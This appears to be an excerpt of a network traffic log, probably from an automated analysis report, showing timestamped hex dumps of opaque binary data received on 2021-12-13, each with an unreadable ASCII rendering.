                                                                                              2021-12-13 23:57:18 UTC7376INData Raw: ce f9 82 fd 18 02 b1 db ca b1 c2 56 ce d3 75 ec 80 7b 26 78 77 47 4d 38 4f f0 bc 3e bc 85 f2 42 03 7a 51 15 56 c1 ea e6 86 2a ec 6a ef 4b 51 13 4e 3d da 0e 1e ad 82 a5 50 38 81 c7 27 2b 86 ea bc 15 aa 67 79 15 56 47 05 db 53 ce 19 06 4f 24 db 81 69 32 bc fb c2 89 25 86 12 5b c4 13 23 53 84 55 1e 36 84 2c f6 59 54 c6 32 dd 74 54 d3 7f af 81 df e3 87 17 42 ba dd be 85 1e e6 2b d7 34 b5 78 85 3a 6f b9 bb 9c ce 02 eb 8c 99 e1 d7 c4 c9 5b aa 60 5a 51 ed 61 ae 72 7d 2c 0c 93 23 cf 0a b5 78 f9 7c 37 86 9d ae 87 45 7c fe c5 bc ee f3 ee 36 4a 94 c6 e9 77 10 2d 97 1c 6c cc 1c 7e ed 64 d0 56 c5 7e 34 87 97 15 5e 43 97 d8 b9 b9 57 5d 6d 05 33 cf 89 a2 44 8c 78 38 b4 bb 01 47 b2 cb e6 47 db 03 c4 ab 23 d4 c6 4c 1c 18 41 9d a1 25 c0 cd 46 b2 26 84 47 19 b3 f1 80 3e 38
                                                                                              Data Ascii: Vu{&xwGM8O>BzQV*jKQN=P8'+gyVGSO$i2%[#SU6,YT2tTB+4x:o[`ZQar},#x|7E|6Jw-l~dV~4^CW]m3Dx8GG#LA%F&G>8
                                                                                              2021-12-13 23:57:18 UTC7377INData Raw: 81 7b 95 d9 1a c7 9b 69 3a 9e ae 9a a0 4f b2 e3 31 b7 74 9f b1 1c e7 c7 d4 87 86 96 21 96 ba d9 93 b7 10 d3 4d 46 c1 bb 6e 3e 7b f8 16 62 c7 a9 ee 40 e8 96 b5 c6 5b f4 0b e2 74 de 81 de 9d 47 29 2a 0f 70 c1 34 9f 2d a1 ec f3 f1 5c ed ea 89 d8 51 d1 e5 cb 01 2e be ca d9 4c f8 dc 3c b2 e1 e3 0c e0 c5 86 83 0d 4d 23 e5 3d c8 17 06 71 0a ae e0 78 1b 0c c4 8a 3a 92 2c 21 8c 60 23 09 28 37 f9 c8 fb d2 e5 3d 3b f4 58 73 33 27 f1 58 26 44 3b 1d 37 7a 8e cc 26 c4 33 31 d7 d3 94 eb 91 d9 7a ac 87 29 d6 64 34 94 c0 63 99 b1 ec e9 78 6f d2 ef 66 63 73 c5 00 01 5c a0 98 cf fe 51 4a 91 78 38 a1 22 14 6e d5 6c 3d 44 b8 c8 3f 0b a5 fe 68 b8 24 d9 3c 56 5c b8 24 33 66 47 4a 22 d0 15 49 33 42 b1 0e 87 4b 52 ca 63 c5 87 4b 92 10 55 12 07 5d a6 64 0c c5 da ac c7 82 ea e0 b1
                                                                                              Data Ascii: {i:O1t!MFn>{b@[tG)*p4-\Q.L<M#=qx:,!`#(7=;Xs3'X&D;7z&31z)d4cxofcs\QJx8"nl=D?h$<V\$3fGJ"I3BKRcKU]d
                                                                                              2021-12-13 23:57:18 UTC7393INData Raw: 8a c9 ed c7 4d 53 ca ff 45 08 71 c8 67 61 1b 08 49 78 78 58 88 52 8c ea 09 26 a3 55 63 d1 04 79 b5 0b 4e c9 b2 b2 a7 36 6a 15 18 d7 79 a1 5a ec ea 10 68 f2 26 ed 08 85 b1 ae 3c 19 5e 8d 9d d1 e3 15 a0 85 8e f2 e2 3f fb fb 54 2e 18 93 28 67 f4 aa 66 c3 ed 78 f5 c4 67 e6 54 ef e9 4f cd a9 6c 1b ed e6 42 9a b3 bc 33 57 c2 fb 4f a1 42 76 9f 84 2f 1d 42 66 0f 06 f8 11 76 96 33 dc d8 f0 61 48 eb c5 07 56 ad a7 6b f5 19 7c 26 5c c0 47 5f b4 92 e3 4b f3 1a ea 21 e3 c6 ef a0 93 b2 b0 df 09 3a 43 e6 1c 2f cc 1b 3b d5 1c a7 6f 23 2a 63 71 17 b4 d9 65 ff 23 2a 8a e1 1a ae cd ff 08 12 78 5a 29 26 ff 28 a0 58 ad f6 2b f5 c7 fc 9a b8 56 9b 56 84 9e 2a 79 f6 28 d2 09 a5 be 4b 91 3a e5 2f 05 78 76 f6 ad ac 62 3f 86 4f 79 f1 e2 17 f0 72 0b f4 cc 3f 20 d5 3b 56 8e 4b 5c f1
                                                                                              Data Ascii: MSEqgaIxxXR&UcyN6jyZh&<^?T.(gfxgTOlB3WOBv/Bfv3aHVk|&\G_K!:C/;o#*cqe#*xZ)&(X+VV*y(K:/xvb?Oyr? ;VK\
                                                                                              2021-12-13 23:57:18 UTC7394INData Raw: 12 9b e3 9b 13 9b 86 14 37 0f 69 8a 6f 6e 6d 1e 52 dc 78 40 3a 55 9b 5b 16 d1 c0 39 70 41 96 9f bc 4b 43 c5 66 8b 2a f5 34 1e 10 87 ab 0f 50 52 a9 cd a9 d3 0f 8a 09 05 cd 16 48 e3 5b 32 1f 21 de 10 4c 6e 38 73 bb 68 6d 38 e3 0a 7d f9 4a 3d 5c da 90 9b 2d 7e a7 de cb 31 a8 68 4e 9b 3e 6a 91 64 2c 6d 4e 2a 98 d5 84 41 7a 1b ea 07 0c b5 e7 63 f0 ee 97 90 e9 89 b4 0f 3b 7b f7 cd fc 05 6e 4d f3 0b 15 e8 5b 79 39 ee 9d 69 12 ee 8a 89 a3 f0 dc 1b fb e5 2d 38 86 85 21 b5 55 81 e1 e0 80 52 2a 04 87 06 5c 16 37 1b 3a 47 1f 00 5a 14 0b 08 95 03 21 39 18 51 96 7a 82 36 41 ed 98 36 74 88 7e 0d 05 c4 95 57 19 0c 05 6e 8f b9 cf c3 4e bc c6 75 a9 22 11 2d ec 76 14 c8 d5 35 d1 5e af 44 7b a1 de 94 a7 4a 93 d2 81 80 ea 31 f6 28 0c 75 61 82 f6 81 94 c5 a6 41 b3 f5 8d a8 a3
                                                                                              Data Ascii: 7ionmRx@:U[9pAKCf*4PRH[2!Ln8shm8}J=\-~1hN>jd,mN*Azc;{nM[y9i-8!UR*\7:GZ!9Qz6A6t~WnNu"-v5^D{J1(uaA
                                                                                              2021-12-13 23:57:18 UTC7410INData Raw: 1a 04 58 bd 39 2c f1 4c aa 81 1f f3 3b 86 0d 5e de ac 69 21 dd 35 b5 2f e6 9a 59 dd 24 6d ce f1 bc 5a 8b 74 83 2f 89 49 0f 70 e3 20 f8 3e 3a 72 c5 eb 1f db 74 fd 46 dc be d6 8a 2d a1 d6 99 4d 2b a9 5d e2 58 4a 9c eb c3 e9 02 29 50 94 6b 75 f3 bb 9a b0 fd 16 6e 46 79 79 1c f0 80 5c a6 dd 1f 7d e5 d3 85 45 0d 14 19 ad ee d0 e5 56 3a d3 4f 86 90 b6 67 4b 93 2a d4 77 37 7e 84 db 77 4a d9 49 b5 34 5e 29 eb 54 4b 4d b6 67 0d 1b 3f c1 fd b9 8d 41 ed 66 83 a1 b5 d3 5e a5 94 75 29 2e b6 f1 ac b1 45 d3 a4 2b 73 8e 03 2f 2d f6 77 4a 29 05 72 bf 79 dd 69 18 59 3c 4e 6a 62 81 fa ce 27 9f f4 99 9e 5c d8 7d 3f aa 6f dd 6e 31 78 02 52 67 a0 fe ad c7 1f 7f 5c 9d 66 85 a6 37 2f 30 cf a8 b6 3e 24 7f 3c de bc 17 29 78 64 e3 c7 e3 a1 ab 54 6a 7a 14 d7 e9 bb e2 6e 91 0f 76 ce
                                                                                              Data Ascii: X9,L;^i!5/Y$mZt/Ip >:rtF-M+]XJ)PkunFyy\}EV:OgK*w7~wJI4^)TKMg?Af^u).E+s/-wJ)ryiY<Njb'\}?on1xRg\f7/0>$<)xdTjznv
                                                                                              2021-12-13 23:57:18 UTC7411INData Raw: bc 44 16 9e 45 8f c9 6b 77 ca d2 2e 79 ed 7e 79 ed 1e 79 ed 6e 79 ed 0b f2 da e7 e5 b5 fb e4 b5 cf a5 ae 9d 2e 4d e9 5c 51 ae 7d 49 4b 3b fc 7a bd de ff 72 8d bc d1 70 78 c5 71 72 f1 de a7 62 d2 79 71 5c fa 58 d1 98 1e 2b 1a d2 c7 4b fa ac ee ee ff 99 f4 54 4c 96 e7 aa c9 bc 7d 0e 3d b4 31 dd bb fb 98 3e fe a9 96 fa ae e4 fa ab c6 cd a3 37 e8 d7 2c ef fe 37 c5 3a 5d 19 eb ff d2 de 02 9d 34 6a c3 a8 35 dd c7 cc 6f 36 79 3a 67 89 93 73 72 c4 f1 9e 4e bd b9 51 a1 13 c2 b6 ee 57 37 c4 ac 39 26 ec a4 e9 a0 fb bf 7b ec 3b 39 a4 bb 7f cc 78 ca d2 1e b0 dd f4 72 38 43 c3 06 43 f7 2f d3 67 89 09 e9 89 e2 f4 05 47 c4 d7 d2 2d e6 a7 e9 29 d4 74 e1 c9 b8 f4 32 f3 d3 49 14 b7 9b 9f 49 a0 27 39 46 77 37 2c df 60 ea a2 37 35 f9 25 35 7f bf 80 ed 04 43 d8 9a b7 15 01 b9
                                                                                              Data Ascii: DEkw.y~yyny.M\Q}IK;zrpxqrbyq\X+KTL}=1>7,7:]4j5o6y:gsrNQW79&{;9xr8CC/gG-)t2II'9Fw7,`75%5C
                                                                                              2021-12-13 23:57:18 UTC7427INData Raw: 08 dc 39 cf 0d 3c 01 6c 66 3c b5 1a 06 84 68 64 e2 db 49 31 2f e6 43 7e e4 43 1e a4 b3 d9 17 df be 56 59 63 1f 25 ee cc c3 a3 2a b2 05 7e aa bb 95 1d 42 54 40 14 09 02 ae 10 5a 40 50 40 4c 08 41 82 01 62 12 40 36 93 90 34 61 c9 d2 76 27 21 01 c4 86 51 01 59 8c 0b 08 8a 12 14 64 c7 56 c1 15 c7 c0 38 a3 33 83 4c 5c 3e c7 19 b7 f0 70 e1 29 98 88 8c a0 32 ce fb d5 bd bd a7 3b f8 de 3f 2f df f7 fb aa ea 9c aa 53 a7 ea d6 bd 7d 3b b7 eb 5c d2 b4 71 a3 c4 4c 47 1a 69 96 21 a7 0e 55 69 41 43 da 63 46 5b 33 c6 83 8b 78 8a c3 f8 8d fb 8c 82 c1 30 26 86 c6 08 f5 40 8d f7 5b 8e 1b 3f 21 bb 97 f1 e9 34 5a fe ef 7f f6 13 b6 f8 84 85 66 9c ab cc ac 91 59 df 2c 7a 7f e3 b6 9f 47 a5 6c eb f9 de a7 4b cf 6b 7c 52 5f f8 52 86 4c f3 bd c6 77 5a 36 df bb a7 e9 2f 7e fa ad b8
                                                                                              Data Ascii: 9<lf<hdI1/C~CVYc%*~BT@Z@P@LAb@64av'!QYdV83L\>p)2;?/S};\qLGi!UiACcF[3x0&@[?!4ZfY,zGlKk|R_RLwZ6/~
                                                                                              2021-12-13 23:57:18 UTC7428INData Raw: 74 c4 d7 06 ea 9f 80 6f f1 c9 aa d7 0e 6d cb d1 2d 44 36 86 ba 67 a0 3f b2 79 e7 33 06 e4 8a 3a 3f 22 4b 27 9d c0 9c 4c c2 7e 09 f2 ad f0 09 7e 3c 47 dd 36 f8 f9 1f da 3f 4c b9 14 f9 83 1a fa 9f 4e bb 07 90 8f a4 4e 1a 75 26 93 5f 09 db d0 9f 21 dd 80 ad 7b 99 63 27 65 0f 75 df 61 9c 3b b1 e1 a4 6d 29 b8 e0 4e 98 47 dd 2a 58 00 f5 71 e2 e9 ce 58 87 22 5f 8a 8f 0b f0 eb 75 3d 4e ca fb d1 77 21 bd 17 bb 0f 90 1e c7 6e 67 d2 6a 68 20 ff 1d dc 4f fe 7c 7d 9e b5 e0 d8 d0 ae 27 dc 40 79 10 b4 24 9f 82 bd 32 7c bd 12 0e 53 bf 05 b2 43 a4 6f e8 f9 c6 b7 89 94 6f 87 95 e8 6f c4 d6 58 ea f7 26 1d 83 ef 9f 23 7b 1f ee 61 9e 16 80 1d ba 41 0b f8 09 9f f7 b2 d6 b2 18 ef 1b f4 95 4a 9b 34 18 0e 76 e8 05 d7 c2 0a 78 0d fd 21 c6 30 95 7e 4e c3 11 fd f5 15 fe 0b 1b 9f 40
                                                                                              Data Ascii: tom-D6g?y3:?"K'L~~<G6?LNNu&_!{c'eua;m)NG*XqX"_u=Nw!ngjh O|}'@y$2|SCoooX&#{aAJ4vx!0~N@
                                                                                              2021-12-13 23:57:18 UTC7444INData Raw: 21 3f c6 65 24 cf 12 33 0c 63 34 d7 5a 0c 15 8e 70 de 86 c3 39 eb 04 a0 9d f7 88 51 62 22 52 8b 94 da 50 2a f6 e7 b8 7a 92 bb 48 7f 92 80 1e dc 85 74 70 8a 7c 4f 42 e4 16 48 e2 51 f0 26 6f c9 1f c8 67 e4 50 7a 3d 9c 7f 37 7a 1b 9d 4c a7 d3 b9 f4 05 ba 14 78 5d 0d 0d d8 43 0f 03 a1 5f d3 1f e9 cf f4 12 a5 9d b2 48 59 ea f3 f8 8b ec 5d f6 21 fb 18 9c 7b 8c 7d cb ae 51 5b ab 1d d5 78 60 78 9e b6 50 ab 45 06 2c 34 3e 35 26 f0 a9 fc 79 be 85 7f 8f 4e 6b 62 1d b0 0e 59 5f 5b 4d ec 7f d9 ed ed 39 f6 62 8c 51 ad dd c2 e9 e5 24 3a af 3a 97 88 56 be e2 3f 84 5c 75 56 50 f7 25 77 89 5b e3 9e 75 a5 8c 86 52 0e 8e a1 35 b9 c5 4f 3e 4f e0 08 8e 91 d3 a4 93 62 2b 5d 94 04 65 28 d4 e6 11 e5 71 b8 b5 25 ca 1a 65 93 b2 55 d9 a9 ec 51 0e 2a b5 c8 ac 97 b1 a6 ec 1a 16 ce da
                                                                                              Data Ascii: !?e$3c4Zp9Qb"RP*zHtp|OBHQ&ogPz=7zLx]C_HY]!{}Q[x`xPE,4>5&yNkbY_[M9bQ$::V?\uVP%w[uR5O>Ob+]e(q%eUQ*
                                                                                              2021-12-13 23:57:18 UTC7445INData Raw: 44 39 c4 61 8e e1 d8 4e f4 45 37 1a 0f 45 4e 80 02 24 81 69 53 9c 54 27 0d ec 98 ee 64 38 59 ce 1c 27 1b fa 9c e3 e4 3a 79 ce 72 27 df 59 e5 14 38 eb 9c 42 30 66 b1 b3 cd 29 71 4a 9d 32 e7 00 9c 6c 85 53 79 c1 cb d6 38 b5 d0 bf 60 a4 ca 50 68 79 0b 11 2e 22 44 a4 e8 20 a2 90 2d 99 30 84 2d a2 45 8c e8 21 62 45 1c 54 72 80 48 80 e2 24 89 64 a4 cc d4 df b9 df 6c b0 6f 8e c8 15 79 c8 9a f9 62 95 28 10 eb 44 a1 28 12 c5 62 1b 12 67 a9 28 13 07 44 f9 05 87 5c 23 6a e1 13 24 37 e0 06 bb 21 6e 28 bc 42 0b 37 dc 8d 70 23 dd 0e f0 82 c4 65 c8 9f b6 fb e7 b3 5c 7f ff 0c 57 d1 ef 66 80 6b 90 47 eb fc 73 2d 01 a9 d6 d7 86 00 09 26 21 c8 a4 61 a4 05 52 69 04 f9 fd ac f0 9f cf 6d fd 7a 5e 2b 03 8e 74 06 c9 22 73 7e 77 de f1 bf 9a 51 fc 3b b3 89 7f 75 06 b5 18 d8 88 44
                                                                                              Data Ascii: D9aNE7EN$iST'd8Y':yr'Y8B0f)qJ2lSy8`Phy."D -0-E!bETrH$dloyb(D(bg(D\#j$7!n(B7p#e\WfkGs-&!aRimz^+t"s~wQ;uD
                                                                                              2021-12-13 23:57:18 UTC7461INData Raw: 1f e5 8c 90 c3 12 16 d3 19 4d 7a a1 a2 ce 88 78 b8 94 9e 7f 29 60 3c dc c4 e3 fb 1a 29 24 e6 40 48 2c 5e 8a 0f 9b c2 1b 19 bf fe 4b 30 b1 d7 f8 b5 08 d1 eb 3c 3e 86 8a 02 a2 c5 55 9f c9 5b 29 9a 65 f2 36 0a 67 99 3c 4f f1 2c 93 4f a6 80 96 c9 a7 50 44 03 3f a6 90 06 ab 1a c5 b4 4c 3e 9d 82 5a 25 11 a5 67 70 fe 43 3f c5 56 2b c4 d6 57 ae 50 6c e5 8b 97 e6 49 77 ed c6 d8 9a 4c b1 75 69 8d cc ef e5 b5 51 fc a6 44 f0 fb ca db 57 e1 97 a2 23 f0 4b e1 11 f8 a5 f8 08 fc 52 80 04 7e 29 42 02 bf 14 22 81 5f 8a 91 c0 2f 05 49 c6 2f 06 4a e9 54 5f 88 df e6 fe 30 bf df dd 15 c1 6f db 7b 7d 11 cf 6b 6e fb 5d ff 90 e7 37 3b 76 d4 6b 08 45 a7 7e c1 bf be b7 ab de 69 20 2c 9d c6 fb ef fb 97 a7 ea 9d 26 42 d4 69 fe b6 f6 89 9f d6 3b 2d 84 ab d3 7a f8 ec 57 26 d4 3b 6d 84
                                                                                              Data Ascii: Mzx)`<)$@H,^K0<>U[)e6g<O,OPD?L>Z%gpC?V+WPlIwLuiQDW#KR~)B"_/I/JT_0o{}kn]7;vkE~i ,&Bi;-zW&;m
                                                                                              2021-12-13 23:57:18 UTC7462INData Raw: aa 3d b9 df 5d 4f e4 f0 4f 77 58 da f1 23 8a 8f ed 7a 7c 5a d0 9a 20 12 5f 76 87 b8 d7 df 16 9f 9b ef 96 7e 07 bd ba d6 8a 4f 56 01 f1 c9 ad 94 60 e7 cf 95 ca d9 6c 42 d4 6c 20 7f 42 70 88 fc a1 7c 7b e1 8f 86 e4 db 5b 3e a0 eb ff d6 a8 9f cf 7b 98 ad e3 27 a8 f4 d8 c4 9f 55 16 fd 77 42 75 db 66 bc 17 e8 35 fe 2c 5b e9 f1 95 6c f4 3e 13 f9 89 ae 87 7b d9 4a ed 41 42 b9 d2 8e 1a 1a 7c 05 83 20 3d 19 ce b1 5b fa d2 2b f8 5c d7 0f a2 ef de 57 f8 f9 d1 ea eb e1 c7 13 e2 a7 6e 28 3f ba 30 3f d9 91 fc 4c 1d 86 9f 7f fe d1 08 fc dc e8 1f 3e 7f 40 42 c5 2e f0 3d 80 77 7d fb 7e ff e2 57 80 fb 38 d1 ad ef de 86 4f b2 e0 2a a7 92 e1 19 7e 03 5f 5a ae 12 6f 52 ef c6 2a cf c6 55 7d 93 d3 68 d6 9c c2 9b ea ef c5 d5 77 d4 3e 7c ad 9e 8b ab 7c 16 12 a0 b6 6d e3 f0 e6 73
                                                                                              Data Ascii: =]OOwX#z|Z _v~OV`lBl Bp|{[>{'UwBuf5,[l>{JAB| =[+\Wn(?0?L>@B.=w}~W8O*~_ZoR*U}hw>||ms
                                                                                              2021-12-13 23:57:18 UTC7478INData Raw: 0e 3f 86 23 a1 1d 0b ff 88 e4 a9 f7 f6 d9 36 77 30 7d 81 7a 54 ac 3b 31 b8 40 db 32 ab 4b 3d 2d 76 34 e5 21 60 0d 6b ec b7 fa c2 4d 79 47 39 a3 ad d9 cd cc 8d 93 6b 1c d8 d0 8b d4 50 8b d7 9d d0 84 bf b4 34 60 b4 fe 1d a1 ba 02 38 dd e6 2f 35 7e 25 92 3e 9e 48 a3 d3 fa 69 1d 43 07 f5 6f 38 48 b3 8e 71 82 d7 08 d3 24 b6 27 ac c7 33 c7 db 77 20 e6 81 a8 93 68 ed f5 d6 19 50 52 09 fc 60 58 ce d0 1a df 1c 5a 80 ba 49 6c ef 5c 40 7a 24 aa 72 8c c1 91 84 fc da 2b 78 36 6d c5 fb ec 25 5e e3 47 64 ad 48 5c 8f 03 84 6f 8d fa 63 fa df 8e de ee fa bd 67 70 3a fc 10 1b c4 71 90 10 ae 93 b5 d3 60 e8 fd ac 11 3f 40 60 35 66 d2 03 c9 2a d4 e6 d5 6b c8 b8 70 a5 c4 8d 8b 84 01 27 35 86 ca 18 ed 10 6d a1 cd 07 9d f9 8c a9 67 27 34 2e a2 f2 90 9b 11 3f fd 0a d9 05 60 46 e4
                                                                                              Data Ascii: ?#6w0}zT;1@2K=-v4!`kMyG9kP4`8/5~%>HiCo8Hq$'3w hPR`XZIl\@z$r+x6m%^GdH\ocgp:q`?@`5f*kp'5mg'4.?`F
                                                                                              2021-12-13 23:57:18 UTC7479INData Raw: e6 ec d3 ec 8a 73 48 ec d1 3b 27 8b 7a 68 48 d7 2d 62 bf 73 18 61 74 76 89 1b 43 5d 7a c7 64 71 87 73 48 df 98 26 ee c5 99 e7 34 c4 5e 5d 9f 2c b6 87 0c bd 5d 16 cf 38 bb 70 e1 e1 ec 13 3b 43 7d fa c6 c9 e2 2e a7 a1 77 5a c5 53 b8 ac 72 0e 8b 3b f5 f6 c9 62 47 68 58 ef 48 16 b7 40 67 20 22 9c 43 d4 11 f4 d7 e3 1c d6 75 49 ec c7 f7 00 d0 db 0e ec 0b bb dc 98 2a ee 75 0e a1 1d e8 34 a8 23 e8 af d7 d9 a5 b7 4f 12 cf 68 e8 2c aa 4f dc 85 7d 61 97 9d 16 f1 94 d3 d0 98 93 27 ec 08 fa db e9 ec d3 3b a6 88 5b 34 f4 cd 94 88 5b 1a c7 2d 7b 0c 6e 32 e1 96 33 0a b7 14 8e 5b ee 18 dc 52 09 b7 bc 51 b8 4d e2 b8 e5 23 6e eb 70 51 41 e8 21 06 84 a0 b8 23 74 62 66 d7 8c ee 19 c3 93 d6 a3 56 82 8e c3 2f 5e fc 83 07 1f f9 fa eb 54 18 11 86 5e bb 66 0e cc 30 66 9c 98 b4 0d
                                                                                              Data Ascii: sH;'zhH-bsatvC]zdqsH&4^],]8p;C}.wZSr;bGhXH@g "CuI*u4#Oh,O}a';[4[-{n23[RQM#npQA!#tbfV/^T^f0f
                                                                                              2021-12-13 23:57:18 UTC7495INData Raw: 06 20 48 c2 1e ca 10 dc 10 a9 e9 ec f1 7e 5c 38 0f 8e 7d 66 2a e4 3b 99 48 94 20 91 d6 9b a0 67 b5 f4 05 41 30 35 33 0f 53 6b a9 9e c1 71 f2 fa 8c 00 77 54 01 2d 50 b5 7b 85 49 a9 ad c7 66 80 4d 94 d1 f0 31 2e b0 95 b3 ac fe 95 be ab ac 9e 0d b8 76 c1 45 55 a0 22 59 7e a7 c1 e5 67 87 e0 8d 77 99 b5 b0 ee 9e cf aa ae 3c 33 ae b2 01 f3 a0 c2 57 a9 d0 09 a2 97 8d 8d 63 b0 95 bb 50 61 80 5d 86 0a 94 fd 2f 02 4d 75 1c 2b 34 f7 1d f6 34 48 a4 e4 01 b7 0f 48 7d 1d 7c e7 00 0f d5 24 f6 80 15 7e fd 3f a3 b4 70 e5 19 34 57 dc c1 e6 f7 7b 7a 1d ea 44 56 68 c7 44 e3 f2 28 22 71 d5 5b 2c 5f 62 b3 cc ec a5 46 3c d6 a7 e6 9b 59 d5 4e 3c 67 a7 ce 92 d4 97 f0 4a ad c2 98 d2 87 ea f7 44 8f 8f 86 24 8b 01 2d 27 da 1e 2c 2b 82 49 a7 ec 38 0c a2 b9 fe da 34 f2 c2 ed a4 e3 28
                                                                                              Data Ascii: H~\8}f*;H gA053SkqwT-P{IfM1.vEU"Y~gw<3WcPa]/Mu+44HH}|$~?p4W{zDVhD("q[,_bF<YN<gJD$-',+I84(
                                                                                              2021-12-13 23:57:18 UTC7496INData Raw: 33 ab 0f 69 28 56 22 c5 fa 79 ae 87 b5 5e 3c d9 9e 0e 8d 5d f9 39 e6 52 ac c4 11 c4 2a d6 2a 62 a5 c4 b9 44 41 7b 0b c2 01 77 13 eb 92 ab db d4 35 ce f5 48 43 c3 6f a4 d0 15 b4 b3 36 95 db dd d2 fc e6 ca d3 58 92 ca ed 45 31 eb db c8 06 99 27 63 f6 2a 2c 1c c7 35 b0 b4 10 55 06 98 dd 87 54 d8 7a ca ac f0 3b 05 22 20 a4 32 bd 08 ce 7a 9b 72 88 5d 24 0b 3f eb 9d 5e 9a db 9a e0 0a 17 07 d0 fd ba 1d ea 46 6e 7d ab cb 5c 79 22 20 b2 41 61 da 39 1b 7e 68 65 3c 65 e5 19 ce c8 fb c4 48 09 99 f8 5f c2 ec 2f e1 2d 52 7f 83 78 f9 9d e0 e5 4d e2 c5 09 c1 01 61 15 12 2c 81 f9 65 bd b3 91 13 d5 49 c1 93 9d 61 6c 7c 28 64 c5 8a e6 26 c1 e8 a0 98 9d 2a 94 ad 11 a2 56 11 31 18 15 8a fd 23 8a c8 f9 88 08 b6 22 39 18 56 50 10 7e a7 66 1b 89 71 9d 47 60 87 d3 d4 2b 49 d9 48
                                                                                              Data Ascii: 3i(V"y^<]9R**bDA{w5HCo6XE1'c*,5UTz;" 2zr]$?^Fn}\y" Aa9~he<eH_/-RxMa,eIal|(d&*V1#"9VP~fqG`+IH
                                                                                              2021-12-13 23:57:18 UTC7512INData Raw: 5c ad 6e b1 28 e5 08 2b 95 a8 e6 27 c7 37 84 62 a1 49 0b d3 8c 54 f3 47 c5 a7 c9 b2 d0 dc 15 a6 19 ab e6 8f e7 0e 8c 3e c5 d1 7b 06 98 bf 4a 3e 39 4b 9d 7b 97 3a 6d ac 3a 7b 7c ce 64 57 ce 5c 77 ce b4 8c 9c d9 99 14 dc 71 12 d7 3d 80 89 9b 61 4d dc cc 81 4b dc ac 78 89 db 67 a2 a6 23 25 ec 14 3e 32 25 d2 d5 7c 0e 9b 4e 84 cd 6e 84 4d d1 4e 0a 26 99 12 4d aa a7 25 3e 8d cb 42 e3 0e d3 e0 1a 02 af a6 c2 ab 29 81 f6 54 e9 d5 54 f5 5f 20 0d 1d 82 63 53 e0 d8 14 f5 97 58 1d 17 68 4b 65 df be b6 1a d2 ae 5a 83 8b 55 d1 db be 82 f7 7c 9e 0f 7c f9 bf fb 73 d3 23 96 a6 c6 42 b3 29 4c b3 45 cd df 1e 3f a5 14 4b 4a a5 85 53 8a a3 f7 cb 40 3b 5b 20 9d 70 22 a9 83 ea b4 51 9d 42 c0 c5 49 c0 45 2b e0 c2 33 93 30 25 29 94 74 54 cd 7f 44 2d 9a e3 2b f8 d8 e7 f9 c4 97 bf
                                                                                              Data Ascii: \n(+'7bITG>{J>9K{:m:{|dW\wq=aMKxg#%>2%|NnMN&M%>B)TT_ cSXhKeZU||s#B)LE?KJS@;[ p"QBIE+30%)tTD-+
                                                                                              2021-12-13 23:57:18 UTC7513INData Raw: d6 0c 4b 68 7a 8e ce 9d a3 98 98 98 32 54 a6 0c 96 72 b2 21 35 6c 48 ed da b5 5b 4c 8b 17 63 49 bd 3a 53 e7 ce f4 e6 9b 6f a6 52 6a 2a 96 16 ff 84 9e 3c a1 62 c5 8a 1d a1 23 47 b0 c4 0f a2 28 2a 8a 62 63 63 27 d0 84 09 d4 a9 53 27 2d 69 b5 d4 b5 6b d7 24 4a 4a c2 92 83 fa 52 df be d4 be 7d fb 61 34 6c 18 96 2e ad a2 55 ab c8 d5 d5 75 29 2d 5d 0a 13 7c fd 1d 7d f7 1d 0d 1e 3c b8 3f f5 ef 0f 53 64 06 52 60 20 7f 86 f9 1a bd f6 1a ad 5d bb f6 02 5d b8 40 75 ea d4 19 48 03 07 c2 34 21 2a 52 a9 e8 95 57 5e 11 78 f2 f2 f2 fa 81 7e f8 81 3c 3c 3c 3e a6 8f 3f 86 a9 ee cc a4 99 33 e9 b7 df 7e bb 46 d7 ae c1 64 d3 4a 51 a9 52 b4 70 e1 c2 b3 74 f6 2c 4c 77 7e 06 cd 98 41 01 01 01 53 69 ea 54 98 f0 c0 21 3a 74 88 22 23 23 e7 80 99 61 4a 9f 31 34 66 0c 4d 9c 38 f1 01
                                                                                              Data Ascii: Khz2Tr!5lH[LcI:SoRj*<b#G(*bcc'S'-ik$JJR}a4l.Uu)-]|}<?SdR` ]]@uH4!*RW^x~<<<>?3~FdJQRpt,Lw~ASiT!:t"##aJ14fM8
                                                                                              2021-12-13 23:57:18 UTC7529INData Raw: 2c ab 4c c9 9c 11 e9 44 ef 11 d0 c2 c8 96 83 e1 4f 70 3d ea cc 44 4e 4c 94 49 71 b2 fb c1 c7 0f ae be 90 79 2d 93 67 28 23 c4 63 4c 28 fa 29 74 d8 59 86 26 c1 3a 7a 48 39 27 26 de 77 ac db 92 ad 13 6f 11 f1 51 15 9b 2a c1 22 f7 b0 c4 7a f2 fb d0 86 e5 41 7b fd cb 50 aa 7e d1 6b 23 72 1b ee 6a 58 d2 60 e0 77 2f 37 00 68 16 e1 13 84 1e f6 59 5d 93 71 98 ed 30 4c 0f cf 4c 1f 66 e8 6d 74 ff 95 cf b2 9d 7b 30 50 5a 4b 22 e4 67 f3 74 ac 18 1f c4 6c 42 c7 72 f6 96 3d 21 b3 eb fd 31 7b 22 db 12 f9 f0 f3 36 c3 99 b8 d1 75 66 cc 9e be 77 f2 cf 28 25 78 2e 4e 46 db 5b a0 dc 65 2d bd 21 85 99 a3 0f 25 94 92 6a f1 a4 a6 65 4f 58 6a e9 0d 1f 73 6d 0e dd 0c b9 37 32 73 b5 92 cb de aa 86 d2 d7 e2 85 8a 47 12 3f 2e 67 6e a3 e2 31 8a 1f 66 f4 5b e6 31 45 da cd 91 36 33 d4
                                                                                              Data Ascii: ,LDOp=DNLIqy-g(#cL()tY&:zH9'&woQ*"zA{P~k#rjX`w/7hY]q0LLfmt{0PZK"gtlBr=!1{"6ufw(%x.NF[e-!%jeOXjsm72sG?.gn1f[1E63
